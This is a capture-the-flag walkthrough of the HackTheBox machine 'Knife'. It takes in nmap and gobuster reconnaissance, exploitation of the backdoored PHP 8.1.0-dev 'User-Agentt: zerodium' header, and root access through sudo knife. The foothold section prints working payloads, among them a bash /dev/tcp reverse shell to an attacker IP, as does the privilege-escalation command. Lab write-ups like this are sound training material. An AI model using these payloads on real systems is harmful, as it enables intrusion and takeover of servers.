HackTheBox — Knife Walkthrough
Summary
This is a write-up for a fairly easy Linux machine from hackthebox.eu named Knife. It is a good first box to pwn if you are new to HackTheBox. The web server runs a development build of PHP that shipped with a backdoor; we use that backdoor to get the initial foothold, then look around the box and escalate our privileges to root. So, let's jump in.
Recon
We start with an nmap scan to discover the open ports. I find the snippet below helpful when doing CTFs: it runs a full port scan quickly, then runs a second nmap over only the open ports with the default scripts (-sC) and version detection (-sV). It is taken from the Starting Point module on HackTheBox; you can find it there, or you can visit this link to my repository to check out the script. The version here is slightly modified to store the outputs in a nmap folder (the folder has to exist before nmap can write there, hence the mkdir).
mkdir -p nmap
ports=$(nmap -p- --min-rate=1000 -T4 -oA nmap/knife_open_ports 10.10.10.242 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -sC -sV -p"$ports" -oA nmap/knife 10.10.10.242
Looking at the results:
# Nmap 7.91 scan initiated Sun Sep 12 05:42:33 2021 as: nmap -sC -sV -p22,80 -oA nmap/knife 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 12 05:42:45 2021 -- 1 IP address (1 host up) scanned in 11.58 seconds
We can see only two open ports: 22 (SSH) and 80 (HTTP).
SSH
The banner on port 22 leaks the OpenSSH version along with the platform, which is Ubuntu. A quick search for that OpenSSH version shows no publicly known vulnerability we could use, so we move on to the web server.
HTTP
Let’s have a look at port 80:
We see a static website. Looking at the source code, it does not leak any CMS details; it appears to be a plain static page.
Adding index.html and index.php to the end of the URL:
From the responses we can tell that the application handles the .php extension, so we use that when starting gobuster (-x php).
gobuster dir -u http://10.10.10.242/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -o initial.crawl -t 20 -x php
While gobuster is running, let us check the request and response in Burp Suite:
We can see that a response header leaks the PHP version, and it is a development build (8.1.0-dev). Let's search for it on Google and see if anything interesting turns up.
Looking at the results, we find that this development build contains a backdoor that allows remote code execution.
There is an exploit on exploit-db which we can run. We can also read blog posts to see how it works; this post by flast101 explains it really well, and I recommend reading it for a better understanding.
Two malicious commits were pushed to the PHP Git code repo on Sunday, March 28, and signed off under the names of PHP creator, Rasmus Lerdorf, and maintainer Nikita Popov.
In the malicious commits, the attackers published a mysterious change upstream, “fix typo” under the pretense this was a minor typographical correction.
However, looking at the added line 370, where the zend_eval_string function is called, the code actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on any website running this hijacked version of PHP. The line evaluates PHP code taken from the HTTP User-Agentt header (note the extra t) whenever that header's value starts with 'zerodium'.
Zerodium is a Washington-based security firm that specializes in buying and selling zero-day vulnerabilities for a variety of operating systems and popular desktop and Web applications, including for PHP itself.
Our gobuster scan doesn't give us much.
Initial Foothold
To exploit it, we resend the request with the User-Agent header renamed to User-Agentt and our payload, prefixed with zerodium, as its value:
User-Agentt: zerodiumsystem('id');
After we send the payload we can see that the remote code is executed, and we get the output.
Let's try to get a reverse shell. We start a netcat listener on port 9001 and send the reverse shell through the same header:
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'");
And we get a shell back
Now we upgrade our shell to a proper tty, and we can see that we are james.
Enumeration
Now we can focus on escalating our privileges.
Let's check whether james can run any command with sudo, and we can see that james can run knife as root.
Let's check GTFOBins for anything interesting on knife.
GTFOBins shows that if we can run knife with sudo, we can escalate our privileges.
Let's try that.
Privilege Escalation
We run the following command, which makes knife evaluate a Ruby snippet as root, and that snippet replaces the process with a shell:
sudo knife exec -E 'exec "/bin/sh"'
Voila! We are root.
Flags
# cat root.txt
93565db39d2077f07dd902....713c0
# cat /home/james/user.txt
280d22fe89a681e532be875....6c691
Hope you like this write-up.
~m1kU